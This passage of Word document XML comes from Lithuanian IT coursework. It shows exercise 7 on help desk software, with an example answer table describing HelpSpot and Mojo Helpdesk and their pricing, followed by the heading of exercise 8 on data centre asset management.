              <w:t>Paslaugos pasiekiamumas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2063" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44D2F5E1" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00131ECD" w:rsidRPr="005A5C28" w14:paraId="3AEB8EA3" w14:textId="77777777" w:rsidTr="00131ECD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79225D68" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>..</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36665EFC" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1056BB4C" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3317" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A5C0C9A" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2063" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="685C6069" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A5151C4" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B677AA" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">7 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PAGALBOS STALAS (ANGL. HELP DESK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693E0F4D" w14:textId="5932A15E" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232"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O PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="000866C2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="000866C2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="965"/>
        <w:gridCol w:w="2574"/>
        <w:gridCol w:w="4394"/>
        <w:gridCol w:w="1978"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="30F1A010" w14:textId="77777777" w:rsidTr="00C94383">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CDDE115" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Eil. Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2574" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37108984" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Programinės įrangos pavadinimas: versija / namų puslapio adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4394" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10787136" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Aprašas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="779BD970" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Mokama / Nemokama (sąlygos)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="644213E1" w14:textId="77777777" w:rsidTr="00C94383">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="409661C0" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="126"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2574" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6430D7B8" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>HelpSpot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40D086EF" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>https://www.helpspot.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4394" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AD5578B" w14:textId="731E556D" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>„HelpSpot“ yra pagalbos tarnybos programinė įranga, filtruojanti duomenis, patekusius į šią programinę įrangą. Ši programinė įranga viską skirsto į kategorijas. Ši programinė įranga palaiko el.</w:t>
            </w:r>
            <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">ašto mainus. Ši programinė įranga palaiko neribotą klientų skaičių ir yra visiškai pritaikoma. Peržiūrėkite tendencijas naudodami šią programinę įrangą ir palyginkite visus šioje programinėje įrangoje saugomus duomenis. Ši programinė įranga turi klientų savitarnos </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>portalą. Tai lengvai atnaujina ataskaitas ir tiksliai seka darbo valandas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="058C2560" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Iki 3 agentų nemokama</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C8277FD" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Virš 3 agentų nuo 499$/metus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3B508FA0" w14:textId="77777777" w:rsidTr="00C94383">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56017907" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="126"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2574" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="118CD6AA" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Mojo Helpdesk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6313F86B" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>https://www.mojohelpdesk.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4394" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="102E17B6" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>„Mojo“ pagalbos tarnyba padeda viską stebėti ir valdyti. Ši programinė įranga pašalina klaidas ir tenkina darbuotojų bei klientų pageidavimus. Paprašykite šios programinės įrangos demonstracinės versijos ir pradėkite ją naudoti. Ši programinė įranga centralizuoja užklausas ir sumažina gaunamų užklausų skaičių, nes turi įmontuotą žinių bazę. Ši programinė įranga padeda viską sutvarkyti automatiškai, nes joje yra automatikos. Ši programinė įranga turi kontaktinį bilietų portalą, kuris leidžia vartotojams prisijungti ir kurti bilietus.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="535057BD" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>14 d. nemokama versija</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C42D775" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nuo 29$/mėn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6E3464B8" w14:textId="77777777" w:rsidTr="00C94383">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CA2CB16" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="126"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2574" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C55DC4A" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4394" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74F0DFCA" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57C65193" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F74232" w:rsidRPr="005A5C28" w14:paraId="06175EA3" w14:textId="77777777" w:rsidTr="00C94383">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B08CB65" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>..</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2574" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B6FD8E7" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4394" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CE0EF76" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C4F37AA" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="499639A7" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F8C725" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">8 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>DUOMENŲ CENTRO IR SERVERIŲ KAMBARIO TURTO VALDYMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5B61C6" w14:textId="7C57F47A" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232"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ATSAKYMO PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="000866C2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="000866C2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
